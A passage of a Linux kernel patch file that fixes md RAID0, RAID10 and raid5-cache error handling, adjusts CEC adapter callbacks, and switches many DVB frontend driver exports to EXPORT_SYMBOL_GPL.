+ struct md_rdev *md_find_rdev_rcu(struct mddev *mddev, dev_t dev);
+ 
+-static inline bool is_mddev_broken(struct md_rdev *rdev, const char *md_type)
++static inline bool is_rdev_broken(struct md_rdev *rdev)
+ {
+-	if (!disk_live(rdev->bdev->bd_disk)) {
+-		if (!test_and_set_bit(MD_BROKEN, &rdev->mddev->flags))
+-			pr_warn("md: %s: %s array has a missing/failed member\n",
+-				mdname(rdev->mddev), md_type);
+-		return true;
+-	}
+-	return false;
++	return !disk_live(rdev->bdev->bd_disk);
+ }
+ 
+ static inline void rdev_dec_pending(struct md_rdev *rdev, struct mddev *mddev)
+diff --git a/drivers/md/raid0.c b/drivers/md/raid0.c
+index 0f7c3b3c62b25..7c6a0b4437d8f 100644
+--- a/drivers/md/raid0.c
++++ b/drivers/md/raid0.c
+@@ -557,14 +557,50 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	bio_endio(bio);
+ }
+ 
+-static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
++static void raid0_map_submit_bio(struct mddev *mddev, struct bio *bio)
+ {
+ 	struct r0conf *conf = mddev->private;
+ 	struct strip_zone *zone;
+ 	struct md_rdev *tmp_dev;
+-	sector_t bio_sector;
++	sector_t bio_sector = bio->bi_iter.bi_sector;
++	sector_t sector = bio_sector;
++
++	md_account_bio(mddev, &bio);
++
++	zone = find_zone(mddev->private, &sector);
++	switch (conf->layout) {
++	case RAID0_ORIG_LAYOUT:
++		tmp_dev = map_sector(mddev, zone, bio_sector, &sector);
++		break;
++	case RAID0_ALT_MULTIZONE_LAYOUT:
++		tmp_dev = map_sector(mddev, zone, sector, &sector);
++		break;
++	default:
++		WARN(1, "md/raid0:%s: Invalid layout\n", mdname(mddev));
++		bio_io_error(bio);
++		return;
++	}
++
++	if (unlikely(is_rdev_broken(tmp_dev))) {
++		bio_io_error(bio);
++		md_error(mddev, tmp_dev);
++		return;
++	}
++
++	bio_set_dev(bio, tmp_dev->bdev);
++	bio->bi_iter.bi_sector = sector + zone->dev_start +
++		tmp_dev->data_offset;
++
++	if (mddev->gendisk)
++		trace_block_bio_remap(bio, disk_devt(mddev->gendisk),
++				      bio_sector);
++	mddev_check_write_zeroes(mddev, bio);
++	submit_bio_noacct(bio);
++}
++
++static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
++{
+ 	sector_t sector;
+-	sector_t orig_sector;
+ 	unsigned chunk_sects;
+ 	unsigned sectors;
+ 
+@@ -577,8 +613,7 @@ static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
+ 		return true;
+ 	}
+ 
+-	bio_sector = bio->bi_iter.bi_sector;
+-	sector = bio_sector;
++	sector = bio->bi_iter.bi_sector;
+ 	chunk_sects = mddev->chunk_sectors;
+ 
+ 	sectors = chunk_sects -
+@@ -586,49 +621,15 @@ static bool raid0_make_request(struct mddev *mddev, struct bio *bio)
+ 		 ? (sector & (chunk_sects-1))
+ 		 : sector_div(sector, chunk_sects));
+ 
+-	/* Restore due to sector_div */
+-	sector = bio_sector;
+-
+ 	if (sectors < bio_sectors(bio)) {
+ 		struct bio *split = bio_split(bio, sectors, GFP_NOIO,
+ 					      &mddev->bio_set);
+ 		bio_chain(split, bio);
+-		submit_bio_noacct(bio);
++		raid0_map_submit_bio(mddev, bio);
+ 		bio = split;
+ 	}
+ 
+-	if (bio->bi_pool != &mddev->bio_set)
+-		md_account_bio(mddev, &bio);
+-
+-	orig_sector = sector;
+-	zone = find_zone(mddev->private, &sector);
+-	switch (conf->layout) {
+-	case RAID0_ORIG_LAYOUT:
+-		tmp_dev = map_sector(mddev, zone, orig_sector, &sector);
+-		break;
+-	case RAID0_ALT_MULTIZONE_LAYOUT:
+-		tmp_dev = map_sector(mddev, zone, sector, &sector);
+-		break;
+-	default:
+-		WARN(1, "md/raid0:%s: Invalid layout\n", mdname(mddev));
+-		bio_io_error(bio);
+-		return true;
+-	}
+-
+-	if (unlikely(is_mddev_broken(tmp_dev, "raid0"))) {
+-		bio_io_error(bio);
+-		return true;
+-	}
+-
+-	bio_set_dev(bio, tmp_dev->bdev);
+-	bio->bi_iter.bi_sector = sector + zone->dev_start +
+-		tmp_dev->data_offset;
+-
+-	if (mddev->gendisk)
+-		trace_block_bio_remap(bio, disk_devt(mddev->gendisk),
+-				      bio_sector);
+-	mddev_check_write_zeroes(mddev, bio);
+-	submit_bio_noacct(bio);
++	raid0_map_submit_bio(mddev, bio);
+ 	return true;
+ }
+ 
+@@ -638,6 +639,16 @@ static void raid0_status(struct seq_file *seq, struct mddev *mddev)
+ 	return;
+ }
+ 
++static void raid0_error(struct mddev *mddev, struct md_rdev *rdev)
++{
++	if (!test_and_set_bit(MD_BROKEN, &mddev->flags)) {
++		char *md_name = mdname(mddev);
++
++		pr_crit("md/raid0%s: Disk failure on %pg detected, failing array.\n",
++			md_name, rdev->bdev);
++	}
++}
++
+ static void *raid0_takeover_raid45(struct mddev *mddev)
+ {
+ 	struct md_rdev *rdev;
+@@ -813,6 +824,7 @@ static struct md_personality raid0_personality=
+ 	.size		= raid0_size,
+ 	.takeover	= raid0_takeover,
+ 	.quiesce	= raid0_quiesce,
++	.error_handler	= raid0_error,
+ };
+ 
+ static int __init raid0_init (void)
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index d2098fcd6a270..7b318e7e8d459 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -1317,6 +1317,25 @@ static void raid10_write_one_disk(struct mddev *mddev, struct r10bio *r10_bio,
+ 	}
+ }
+ 
++static struct md_rdev *dereference_rdev_and_rrdev(struct raid10_info *mirror,
++						  struct md_rdev **prrdev)
++{
++	struct md_rdev *rdev, *rrdev;
++
++	rrdev = rcu_dereference(mirror->replacement);
++	/*
++	 * Read replacement first to prevent reading both rdev and
++	 * replacement as NULL during replacement replace rdev.
++	 */
++	smp_mb();
++	rdev = rcu_dereference(mirror->rdev);
++	if (rdev == rrdev)
++		rrdev = NULL;
++
++	*prrdev = rrdev;
++	return rdev;
++}
++
+ static void wait_blocked_dev(struct mddev *mddev, struct r10bio *r10_bio)
+ {
+ 	int i;
+@@ -1327,11 +1346,9 @@ retry_wait:
+ 	blocked_rdev = NULL;
+ 	rcu_read_lock();
+ 	for (i = 0; i < conf->copies; i++) {
+-		struct md_rdev *rdev = rcu_dereference(conf->mirrors[i].rdev);
+-		struct md_rdev *rrdev = rcu_dereference(
+-			conf->mirrors[i].replacement);
+-		if (rdev == rrdev)
+-			rrdev = NULL;
++		struct md_rdev *rdev, *rrdev;
++
++		rdev = dereference_rdev_and_rrdev(&conf->mirrors[i], &rrdev);
+ 		if (rdev && unlikely(test_bit(Blocked, &rdev->flags))) {
+ 			atomic_inc(&rdev->nr_pending);
+ 			blocked_rdev = rdev;
+@@ -1460,15 +1477,7 @@ static void raid10_write_request(struct mddev *mddev, struct bio *bio,
+ 		int d = r10_bio->devs[i].devnum;
+ 		struct md_rdev *rdev, *rrdev;
+ 
+-		rrdev = rcu_dereference(conf->mirrors[d].replacement);
+-		/*
+-		 * Read replacement first to prevent reading both rdev and
+-		 * replacement as NULL during replacement replace rdev.
+-		 */
+-		smp_mb();
+-		rdev = rcu_dereference(conf->mirrors[d].rdev);
+-		if (rdev == rrdev)
+-			rrdev = NULL;
++		rdev = dereference_rdev_and_rrdev(&conf->mirrors[d], &rrdev);
+ 		if (rdev && (test_bit(Faulty, &rdev->flags)))
+ 			rdev = NULL;
+ 		if (rrdev && (test_bit(Faulty, &rrdev->flags)))
+@@ -1775,10 +1784,9 @@ retry_discard:
+ 	 */
+ 	rcu_read_lock();
+ 	for (disk = 0; disk < geo->raid_disks; disk++) {
+-		struct md_rdev *rdev = rcu_dereference(conf->mirrors[disk].rdev);
+-		struct md_rdev *rrdev = rcu_dereference(
+-			conf->mirrors[disk].replacement);
++		struct md_rdev *rdev, *rrdev;
+ 
++		rdev = dereference_rdev_and_rrdev(&conf->mirrors[disk], &rrdev);
+ 		r10_bio->devs[disk].bio = NULL;
+ 		r10_bio->devs[disk].repl_bio = NULL;
+ 
+diff --git a/drivers/md/raid5-cache.c b/drivers/md/raid5-cache.c
+index 832d8566e1656..eb66d0bfe39d2 100644
+--- a/drivers/md/raid5-cache.c
++++ b/drivers/md/raid5-cache.c
+@@ -1260,14 +1260,13 @@ static void r5l_log_flush_endio(struct bio *bio)
+ 
+ 	if (bio->bi_status)
+ 		md_error(log->rdev->mddev, log->rdev);
++	bio_uninit(bio);
+ 
+ 	spin_lock_irqsave(&log->io_list_lock, flags);
+ 	list_for_each_entry(io, &log->flushing_ios, log_sibling)
+ 		r5l_io_run_stripes(io);
+ 	list_splice_tail_init(&log->flushing_ios, &log->finished_ios);
+ 	spin_unlock_irqrestore(&log->io_list_lock, flags);
+-
+-	bio_uninit(bio);
+ }
+ 
+ /*
+@@ -3166,12 +3165,15 @@ void r5l_exit_log(struct r5conf *conf)
+ {
+ 	struct r5l_log *log = conf->log;
+ 
+-	/* Ensure disable_writeback_work wakes up and exits */
+-	wake_up(&conf->mddev->sb_wait);
+-	flush_work(&log->disable_writeback_work);
+ 	md_unregister_thread(&log->reclaim_thread);
+ 
++	/*
++	 * 'reconfig_mutex' is held by caller, set 'confg->log' to NULL to
++	 * ensure disable_writeback_work wakes up and exits.
++	 */
+ 	conf->log = NULL;
++	wake_up(&conf->mddev->sb_wait);
++	flush_work(&log->disable_writeback_work);
+ 
+ 	mempool_exit(&log->meta_pool);
+ 	bioset_exit(&log->bs);
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index b1512f9c5895c..4bc2a705029e6 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -385,8 +385,8 @@ static void cec_data_cancel(struct cec_data *data, u8 tx_status, u8 rx_status)
+ 	cec_queue_msg_monitor(adap, &data->msg, 1);
+ 
+ 	if (!data->blocking && data->msg.sequence)
+-		/* Allow drivers to process the message first */
+-		call_op(adap, received, &data->msg);
++		/* Allow drivers to react to a canceled transmit */
++		call_void_op(adap, adap_nb_transmit_canceled, &data->msg);
+ 
+ 	cec_data_completed(data);
+ }
+@@ -1345,7 +1345,7 @@ static void cec_adap_unconfigure(struct cec_adapter *adap)
+ 	cec_flush(adap);
+ 	wake_up_interruptible(&adap->kthread_waitq);
+ 	cec_post_state_event(adap);
+-	call_void_op(adap, adap_configured, false);
++	call_void_op(adap, adap_unconfigured);
+ }
+ 
+ /*
+@@ -1536,7 +1536,7 @@ configured:
+ 	adap->kthread_config = NULL;
+ 	complete(&adap->config_completion);
+ 	mutex_unlock(&adap->lock);
+-	call_void_op(adap, adap_configured, true);
++	call_void_op(adap, configured);
+ 	return 0;
+ 
+ unconfigure:
+diff --git a/drivers/media/cec/usb/pulse8/pulse8-cec.c b/drivers/media/cec/usb/pulse8/pulse8-cec.c
+index 04b13cdc38d2c..ba67587bd43ec 100644
+--- a/drivers/media/cec/usb/pulse8/pulse8-cec.c
++++ b/drivers/media/cec/usb/pulse8/pulse8-cec.c
+@@ -809,8 +809,11 @@ static void pulse8_ping_eeprom_work_handler(struct work_struct *work)
+ 
+ 	mutex_lock(&pulse8->lock);
+ 	cmd = MSGCODE_PING;
+-	pulse8_send_and_wait(pulse8, &cmd, 1,
+-			     MSGCODE_COMMAND_ACCEPTED, 0);
++	if (pulse8_send_and_wait(pulse8, &cmd, 1,
++				 MSGCODE_COMMAND_ACCEPTED, 0)) {
++		dev_warn(pulse8->dev, "failed to ping EEPROM\n");
++		goto unlock;
++	}
+ 
+ 	if (pulse8->vers < 2)
+ 		goto unlock;
+diff --git a/drivers/media/dvb-frontends/ascot2e.c b/drivers/media/dvb-frontends/ascot2e.c
+index 9b00b56230b61..cf8e5f1bd1018 100644
+--- a/drivers/media/dvb-frontends/ascot2e.c
++++ b/drivers/media/dvb-frontends/ascot2e.c
+@@ -533,7 +533,7 @@ struct dvb_frontend *ascot2e_attach(struct dvb_frontend *fe,
+ 		priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(ascot2e_attach);
++EXPORT_SYMBOL_GPL(ascot2e_attach);
+ 
+ MODULE_DESCRIPTION("Sony ASCOT2E terr/cab tuner driver");
+ MODULE_AUTHOR("info@netup.ru");
+diff --git a/drivers/media/dvb-frontends/atbm8830.c b/drivers/media/dvb-frontends/atbm8830.c
+index bdd16b9c58244..778c865085bf9 100644
+--- a/drivers/media/dvb-frontends/atbm8830.c
++++ b/drivers/media/dvb-frontends/atbm8830.c
+@@ -489,7 +489,7 @@ error_out:
+ 	return NULL;
+ 
+ }
+-EXPORT_SYMBOL(atbm8830_attach);
++EXPORT_SYMBOL_GPL(atbm8830_attach);
+ 
+ MODULE_DESCRIPTION("AltoBeam ATBM8830/8831 GB20600 demodulator driver");
+ MODULE_AUTHOR("David T. L. Wong <davidtlwong@gmail.com>");
+diff --git a/drivers/media/dvb-frontends/au8522_dig.c b/drivers/media/dvb-frontends/au8522_dig.c
+index 78cafdf279618..230436bf6cbd9 100644
+--- a/drivers/media/dvb-frontends/au8522_dig.c
++++ b/drivers/media/dvb-frontends/au8522_dig.c
+@@ -879,7 +879,7 @@ error:
+ 	au8522_release_state(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(au8522_attach);
++EXPORT_SYMBOL_GPL(au8522_attach);
+ 
+ static const struct dvb_frontend_ops au8522_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/bcm3510.c b/drivers/media/dvb-frontends/bcm3510.c
+index 68b92b4419cff..b3f5c49accafd 100644
+--- a/drivers/media/dvb-frontends/bcm3510.c
++++ b/drivers/media/dvb-frontends/bcm3510.c
+@@ -835,7 +835,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(bcm3510_attach);
++EXPORT_SYMBOL_GPL(bcm3510_attach);
+ 
+ static const struct dvb_frontend_ops bcm3510_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/cx22700.c b/drivers/media/dvb-frontends/cx22700.c
+index b39ff516271b2..1d04c0a652b26 100644
+--- a/drivers/media/dvb-frontends/cx22700.c
++++ b/drivers/media/dvb-frontends/cx22700.c
+@@ -432,4 +432,4 @@ MODULE_DESCRIPTION("Conexant CX22700 DVB-T Demodulator driver");
+ MODULE_AUTHOR("Holger Waechtler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(cx22700_attach);
++EXPORT_SYMBOL_GPL(cx22700_attach);
+diff --git a/drivers/media/dvb-frontends/cx22702.c b/drivers/media/dvb-frontends/cx22702.c
+index cc6acbf6393d4..61ad34b7004b5 100644
+--- a/drivers/media/dvb-frontends/cx22702.c
++++ b/drivers/media/dvb-frontends/cx22702.c
+@@ -604,7 +604,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx22702_attach);
++EXPORT_SYMBOL_GPL(cx22702_attach);
+ 
+ static const struct dvb_frontend_ops cx22702_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/cx24110.c b/drivers/media/dvb-frontends/cx24110.c
+index 6f99d6a27be2d..9aeea089756fe 100644
+--- a/drivers/media/dvb-frontends/cx24110.c
++++ b/drivers/media/dvb-frontends/cx24110.c
+@@ -653,4 +653,4 @@ MODULE_DESCRIPTION("Conexant CX24110 DVB-S Demodulator driver");
+ MODULE_AUTHOR("Peter Hettkamp");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(cx24110_attach);
++EXPORT_SYMBOL_GPL(cx24110_attach);
+diff --git a/drivers/media/dvb-frontends/cx24113.c b/drivers/media/dvb-frontends/cx24113.c
+index dd55d314bf9af..203cb6b3f941b 100644
+--- a/drivers/media/dvb-frontends/cx24113.c
++++ b/drivers/media/dvb-frontends/cx24113.c
+@@ -590,7 +590,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx24113_attach);
++EXPORT_SYMBOL_GPL(cx24113_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Activates frontend debugging (default:0)");
+diff --git a/drivers/media/dvb-frontends/cx24116.c b/drivers/media/dvb-frontends/cx24116.c
+index ea8264ccbb4e8..8b978a9f74a4e 100644
+--- a/drivers/media/dvb-frontends/cx24116.c
++++ b/drivers/media/dvb-frontends/cx24116.c
+@@ -1133,7 +1133,7 @@ struct dvb_frontend *cx24116_attach(const struct cx24116_config *config,
+ 	state->frontend.demodulator_priv = state;
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(cx24116_attach);
++EXPORT_SYMBOL_GPL(cx24116_attach);
+ 
+ /*
+  * Initialise or wake up device
+diff --git a/drivers/media/dvb-frontends/cx24120.c b/drivers/media/dvb-frontends/cx24120.c
+index d8acd582c7111..44515fdbe91d4 100644
+--- a/drivers/media/dvb-frontends/cx24120.c
++++ b/drivers/media/dvb-frontends/cx24120.c
+@@ -305,7 +305,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx24120_attach);
++EXPORT_SYMBOL_GPL(cx24120_attach);
+ 
+ static int cx24120_test_rom(struct cx24120_state *state)
+ {
+@@ -973,7 +973,9 @@ static void cx24120_set_clock_ratios(struct dvb_frontend *fe)
+ 	cmd.arg[8] = (clock_ratios_table[idx].rate >> 8) & 0xff;
+ 	cmd.arg[9] = (clock_ratios_table[idx].rate >> 0) & 0xff;
+ 
+-	cx24120_message_send(state, &cmd);
++	ret = cx24120_message_send(state, &cmd);
++	if (ret != 0)
++		return;
+ 
+ 	/* Calculate ber window rates for stat work */
+ 	cx24120_calculate_ber_window(state, clock_ratios_table[idx].rate);
+diff --git a/drivers/media/dvb-frontends/cx24123.c b/drivers/media/dvb-frontends/cx24123.c
+index 3d84ee17e54c6..539889e638ccc 100644
+--- a/drivers/media/dvb-frontends/cx24123.c
++++ b/drivers/media/dvb-frontends/cx24123.c
+@@ -1096,7 +1096,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(cx24123_attach);
++EXPORT_SYMBOL_GPL(cx24123_attach);
+ 
+ static const struct dvb_frontend_ops cx24123_ops = {
+ 	.delsys = { SYS_DVBS },
+diff --git a/drivers/media/dvb-frontends/cxd2820r_core.c b/drivers/media/dvb-frontends/cxd2820r_core.c
+index 5d98222f9df09..8870aeac2872f 100644
+--- a/drivers/media/dvb-frontends/cxd2820r_core.c
++++ b/drivers/media/dvb-frontends/cxd2820r_core.c
+@@ -536,7 +536,7 @@ struct dvb_frontend *cxd2820r_attach(const struct cxd2820r_config *config,
+ 
+ 	return pdata.get_dvb_frontend(client);
+ }
+-EXPORT_SYMBOL(cxd2820r_attach);
++EXPORT_SYMBOL_GPL(cxd2820r_attach);
+ 
+ static struct dvb_frontend *cxd2820r_get_dvb_frontend(struct i2c_client *client)
+ {
+diff --git a/drivers/media/dvb-frontends/cxd2841er.c b/drivers/media/dvb-frontends/cxd2841er.c
+index 5431f922f55e4..e9d1eef40c627 100644
+--- a/drivers/media/dvb-frontends/cxd2841er.c
++++ b/drivers/media/dvb-frontends/cxd2841er.c
+@@ -3930,14 +3930,14 @@ struct dvb_frontend *cxd2841er_attach_s(struct cxd2841er_config *cfg,
+ {
+ 	return cxd2841er_attach(cfg, i2c, SYS_DVBS);
+ }
+-EXPORT_SYMBOL(cxd2841er_attach_s);
++EXPORT_SYMBOL_GPL(cxd2841er_attach_s);
+ 
+ struct dvb_frontend *cxd2841er_attach_t_c(struct cxd2841er_config *cfg,
+ 					struct i2c_adapter *i2c)
+ {
+ 	return cxd2841er_attach(cfg, i2c, 0);
+ }
+-EXPORT_SYMBOL(cxd2841er_attach_t_c);
++EXPORT_SYMBOL_GPL(cxd2841er_attach_t_c);
+ 
+ static const struct dvb_frontend_ops cxd2841er_dvbs_s2_ops = {
+ 	.delsys = { SYS_DVBS, SYS_DVBS2 },
+diff --git a/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c b/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c
+index d5b1b3788e392..09d31c368741d 100644
+--- a/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c
++++ b/drivers/media/dvb-frontends/cxd2880/cxd2880_top.c
+@@ -1950,7 +1950,7 @@ struct dvb_frontend *cxd2880_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(cxd2880_attach);
++EXPORT_SYMBOL_GPL(cxd2880_attach);
+ 
+ MODULE_DESCRIPTION("Sony CXD2880 DVB-T2/T tuner + demod driver");
+ MODULE_AUTHOR("Sony Semiconductor Solutions Corporation");
+diff --git a/drivers/media/dvb-frontends/dib0070.c b/drivers/media/dvb-frontends/dib0070.c
+index cafb41dba861c..9a8e7cdd2a247 100644
+--- a/drivers/media/dvb-frontends/dib0070.c
++++ b/drivers/media/dvb-frontends/dib0070.c
+@@ -762,7 +762,7 @@ free_mem:
+ 	fe->tuner_priv = NULL;
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib0070_attach);
++EXPORT_SYMBOL_GPL(dib0070_attach);
+ 
+ MODULE_AUTHOR("Patrick Boettcher <patrick.boettcher@posteo.de>");
+ MODULE_DESCRIPTION("Driver for the DiBcom 0070 base-band RF Tuner");
+diff --git a/drivers/media/dvb-frontends/dib0090.c b/drivers/media/dvb-frontends/dib0090.c
+index 903da33642dff..c958bcff026ec 100644
+--- a/drivers/media/dvb-frontends/dib0090.c
++++ b/drivers/media/dvb-frontends/dib0090.c
+@@ -2634,7 +2634,7 @@ struct dvb_frontend *dib0090_register(struct dvb_frontend *fe, struct i2c_adapte
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(dib0090_register);
++EXPORT_SYMBOL_GPL(dib0090_register);
+ 
+ struct dvb_frontend *dib0090_fw_register(struct dvb_frontend *fe, struct i2c_adapter *i2c, const struct dib0090_config *config)
+ {
+@@ -2660,7 +2660,7 @@ free_mem:
+ 	fe->tuner_priv = NULL;
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib0090_fw_register);
++EXPORT_SYMBOL_GPL(dib0090_fw_register);
+ 
+ MODULE_AUTHOR("Patrick Boettcher <patrick.boettcher@posteo.de>");
+ MODULE_AUTHOR("Olivier Grenie <olivier.grenie@parrot.com>");
+diff --git a/drivers/media/dvb-frontends/dib3000mb.c b/drivers/media/dvb-frontends/dib3000mb.c
+index a6c2fc4586eb3..c598b2a633256 100644
+--- a/drivers/media/dvb-frontends/dib3000mb.c
++++ b/drivers/media/dvb-frontends/dib3000mb.c
+@@ -815,4 +815,4 @@ MODULE_AUTHOR(DRIVER_AUTHOR);
+ MODULE_DESCRIPTION(DRIVER_DESC);
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(dib3000mb_attach);
++EXPORT_SYMBOL_GPL(dib3000mb_attach);
+diff --git a/drivers/media/dvb-frontends/dib3000mc.c b/drivers/media/dvb-frontends/dib3000mc.c
+index 2e11a246aae0d..c2fca8289abae 100644
+--- a/drivers/media/dvb-frontends/dib3000mc.c
++++ b/drivers/media/dvb-frontends/dib3000mc.c
+@@ -935,7 +935,7 @@ error:
+ 	kfree(st);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib3000mc_attach);
++EXPORT_SYMBOL_GPL(dib3000mc_attach);
+ 
+ static const struct dvb_frontend_ops dib3000mc_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/dib7000m.c b/drivers/media/dvb-frontends/dib7000m.c
+index 97ce97789c9e3..fdb22f32e3a11 100644
+--- a/drivers/media/dvb-frontends/dib7000m.c
++++ b/drivers/media/dvb-frontends/dib7000m.c
+@@ -1434,7 +1434,7 @@ error:
+ 	kfree(st);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib7000m_attach);
++EXPORT_SYMBOL_GPL(dib7000m_attach);
+ 
+ static const struct dvb_frontend_ops dib7000m_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/dib7000p.c b/drivers/media/dvb-frontends/dib7000p.c
+index a90d2f51868ff..d1e53de5206ae 100644
+--- a/drivers/media/dvb-frontends/dib7000p.c
++++ b/drivers/media/dvb-frontends/dib7000p.c
+@@ -497,7 +497,7 @@ static int dib7000p_update_pll(struct dvb_frontend *fe, struct dibx000_bandwidth
+ 	prediv = reg_1856 & 0x3f;
+ 	loopdiv = (reg_1856 >> 6) & 0x3f;
+ 
+-	if ((bw != NULL) && (bw->pll_prediv != prediv || bw->pll_ratio != loopdiv)) {
++	if (loopdiv && bw && (bw->pll_prediv != prediv || bw->pll_ratio != loopdiv)) {
+ 		dprintk("Updating pll (prediv: old =  %d new = %d ; loopdiv : old = %d new = %d)\n", prediv, bw->pll_prediv, loopdiv, bw->pll_ratio);
+ 		reg_1856 &= 0xf000;
+ 		reg_1857 = dib7000p_read_word(state, 1857);
+@@ -2822,7 +2822,7 @@ void *dib7000p_attach(struct dib7000p_ops *ops)
+ 
+ 	return ops;
+ }
+-EXPORT_SYMBOL(dib7000p_attach);
++EXPORT_SYMBOL_GPL(dib7000p_attach);
+ 
+ static const struct dvb_frontend_ops dib7000p_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/dib8000.c b/drivers/media/dvb-frontends/dib8000.c
+index fe19d127abb3f..301d8eca7a6f9 100644
+--- a/drivers/media/dvb-frontends/dib8000.c
++++ b/drivers/media/dvb-frontends/dib8000.c
+@@ -4527,7 +4527,7 @@ void *dib8000_attach(struct dib8000_ops *ops)
+ 
+ 	return ops;
+ }
+-EXPORT_SYMBOL(dib8000_attach);
++EXPORT_SYMBOL_GPL(dib8000_attach);
+ 
+ MODULE_AUTHOR("Olivier Grenie <Olivier.Grenie@parrot.com, Patrick Boettcher <patrick.boettcher@posteo.de>");
+ MODULE_DESCRIPTION("Driver for the DiBcom 8000 ISDB-T demodulator");
+diff --git a/drivers/media/dvb-frontends/dib9000.c b/drivers/media/dvb-frontends/dib9000.c
+index 914ca820c174b..6f81890b31eeb 100644
+--- a/drivers/media/dvb-frontends/dib9000.c
++++ b/drivers/media/dvb-frontends/dib9000.c
+@@ -2546,7 +2546,7 @@ error:
+ 	kfree(st);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dib9000_attach);
++EXPORT_SYMBOL_GPL(dib9000_attach);
+ 
+ static const struct dvb_frontend_ops dib9000_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/drx39xyj/drxj.c b/drivers/media/dvb-frontends/drx39xyj/drxj.c
+index bf9e4ef35684b..88860d08f9c12 100644
+--- a/drivers/media/dvb-frontends/drx39xyj/drxj.c
++++ b/drivers/media/dvb-frontends/drx39xyj/drxj.c
+@@ -12368,7 +12368,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(drx39xxj_attach);
++EXPORT_SYMBOL_GPL(drx39xxj_attach);
+ 
+ static const struct dvb_frontend_ops drx39xxj_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/drxd_hard.c b/drivers/media/dvb-frontends/drxd_hard.c
+index 9860cae65f1cf..6a531937f4bbb 100644
+--- a/drivers/media/dvb-frontends/drxd_hard.c
++++ b/drivers/media/dvb-frontends/drxd_hard.c
+@@ -2939,7 +2939,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(drxd_attach);
++EXPORT_SYMBOL_GPL(drxd_attach);
+ 
+ MODULE_DESCRIPTION("DRXD driver");
+ MODULE_AUTHOR("Micronas");
+diff --git a/drivers/media/dvb-frontends/drxk_hard.c b/drivers/media/dvb-frontends/drxk_hard.c
+index 9807f54119965..ff864c9bb7743 100644
+--- a/drivers/media/dvb-frontends/drxk_hard.c
++++ b/drivers/media/dvb-frontends/drxk_hard.c
+@@ -6833,7 +6833,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(drxk_attach);
++EXPORT_SYMBOL_GPL(drxk_attach);
+ 
+ MODULE_DESCRIPTION("DRX-K driver");
+ MODULE_AUTHOR("Ralph Metzler");
+diff --git a/drivers/media/dvb-frontends/ds3000.c b/drivers/media/dvb-frontends/ds3000.c
+index 20fcf31af1658..515aa7c7baf2a 100644
+--- a/drivers/media/dvb-frontends/ds3000.c
++++ b/drivers/media/dvb-frontends/ds3000.c
+@@ -859,7 +859,7 @@ struct dvb_frontend *ds3000_attach(const struct ds3000_config *config,
+ 	ds3000_set_voltage(&state->frontend, SEC_VOLTAGE_OFF);
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(ds3000_attach);
++EXPORT_SYMBOL_GPL(ds3000_attach);
+ 
+ static int ds3000_set_carrier_offset(struct dvb_frontend *fe,
+ 					s32 carrier_offset_khz)
+diff --git a/drivers/media/dvb-frontends/dvb-pll.c b/drivers/media/dvb-frontends/dvb-pll.c
+index baf2a378e565f..fcf322ff82356 100644
+--- a/drivers/media/dvb-frontends/dvb-pll.c
++++ b/drivers/media/dvb-frontends/dvb-pll.c
+@@ -866,7 +866,7 @@ out:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(dvb_pll_attach);
++EXPORT_SYMBOL_GPL(dvb_pll_attach);
+ 
+ 
+ static int
+diff --git a/drivers/media/dvb-frontends/ec100.c b/drivers/media/dvb-frontends/ec100.c
+index 03bd80666cf83..2ad0a3c2f7567 100644
+--- a/drivers/media/dvb-frontends/ec100.c
